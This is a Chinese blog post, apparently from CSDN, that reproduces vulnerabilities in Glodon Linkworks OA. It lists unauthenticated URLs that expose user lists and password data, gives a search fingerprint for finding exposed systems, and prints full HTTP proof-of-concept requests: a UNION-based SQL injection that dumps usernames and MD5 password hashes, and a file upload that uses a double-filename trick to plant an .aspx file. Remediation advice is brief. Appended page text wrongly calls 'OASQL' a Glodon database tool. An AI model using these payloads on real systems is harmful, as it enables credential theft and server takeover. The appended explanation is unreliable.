【漏洞复现】广联达OA漏洞合集(信息泄露+SQL注入+文件上传)


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

广联达OA存在信息泄露

一、漏洞概述

广联达Linkworks办公OA存在信息泄露,攻击者可通过此漏洞获取账号密码登录后台,造成其他影响。

二、漏洞复现

系统界面如下
在这里插入图片描述
存在隐患的URL http://url/Org/service/Service.asmx
在这里插入图片描述
查看所有用户 http://url/Org/service/Service.asmx/GetAllUsersXml
在这里插入图片描述
查看所有工程 http://url/Org/service/Service.asmx/GetDeptXml4GEPS
在这里插入图片描述
查看账户密码 http://url/Org/service/Service.asmx/GetUserXml4GEPS
在这里插入图片描述
解密后登录后台系统如下
在这里插入图片描述

三、修复建议

1、禁用泄露敏感信息的页面或应用。
2、升级到安全版本


广联达Linkworks办公OA SQL注入漏洞+后台文件上传漏洞

一、产品简介

广联达Linkworks办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。

二、漏洞概述

由于广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效过滤,将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。而msgbroadcastuploadfile.aspx接口处存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登录发送请求包获取服务器权限。

三、复现环境

  • 鹰图指纹: web.body="/Services/Identification/Server/"
    在这里插入图片描述
    访问以下URL验证漏洞是否存在
    http://url/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
    在这里插入图片描述
    如以上情况则证明存在漏洞。

SQL注入
POC:

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: XX.XX.XX.XX:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: ASP.NET_SessionId=zldmbkj4ufv4xjlkzvudfs31; GTP_IdServer_LangID=2052; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 83

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER –

在这里插入图片描述
使用MD5解密,可尝试登录后台。

后台文件上传
POC:

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: XX.XX.XX.XX:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: 登录后的cookie
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Length: 195

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="2.aspx";filename="1.jpg"
Content-Type: application/text
 
123456
------WebKitFormBoundaryFfJZ4PlAZBixjELj—

在这里插入图片描述
在这里插入图片描述

四、修复建议

1、限制访问来源地址,如非必要,不要将系统开放在互联网上。
2、更新至最新版本

  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
广联达OASQL注入是一种安全漏洞,指的是攻击者通过在OASQL(广联达公司的一种数据库管理工具)的查询语句中插入恶意代码,从而获得未经授权的数据库访问权限或者执行任意的数据库操作。 OASQL注入漏洞的发生是因为在构建SQL查询语句时没有对用户输入进行充分的验证和过滤。攻击者可以利用这个漏洞,通过输入恶意字符或脚本,来改变原本的SQL查询逻辑。 对于OASQL注入漏洞的防御,可以采取以下几种措施: 1. 输入验证和过滤:在构建SQL查询语句之前,对用户输入进行严格的验证和过滤,确保只包含合法的字符和语法结构,避免将恶意代码作为查询的一部分。 2. 参数化查询:使用参数化查询可以有效地防止注入攻击。参数化查询将查询的参数与查询语句分离,使得输入的内容不会对最终的查询逻辑产生影响。 3. 最小权限原则:为数据库用户分配最小的权限,限制其对敏感数据和操作的访问权限。这样即使发生了注入攻击,攻击者也只能获得有限的权限。 4. 定期更新和修补:保持OASQL和相关软件的更新,并及时安装补丁,以修复已知的安全漏洞。及时跟进厂商发布的安全公告,采取相应的措施来解决已知的漏洞。 总之,广联达OASQL注入是一种常见的安全漏洞,为了防止它的发生,需要在开发和使用过程中采取一系列的安全措施,保护数据库的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值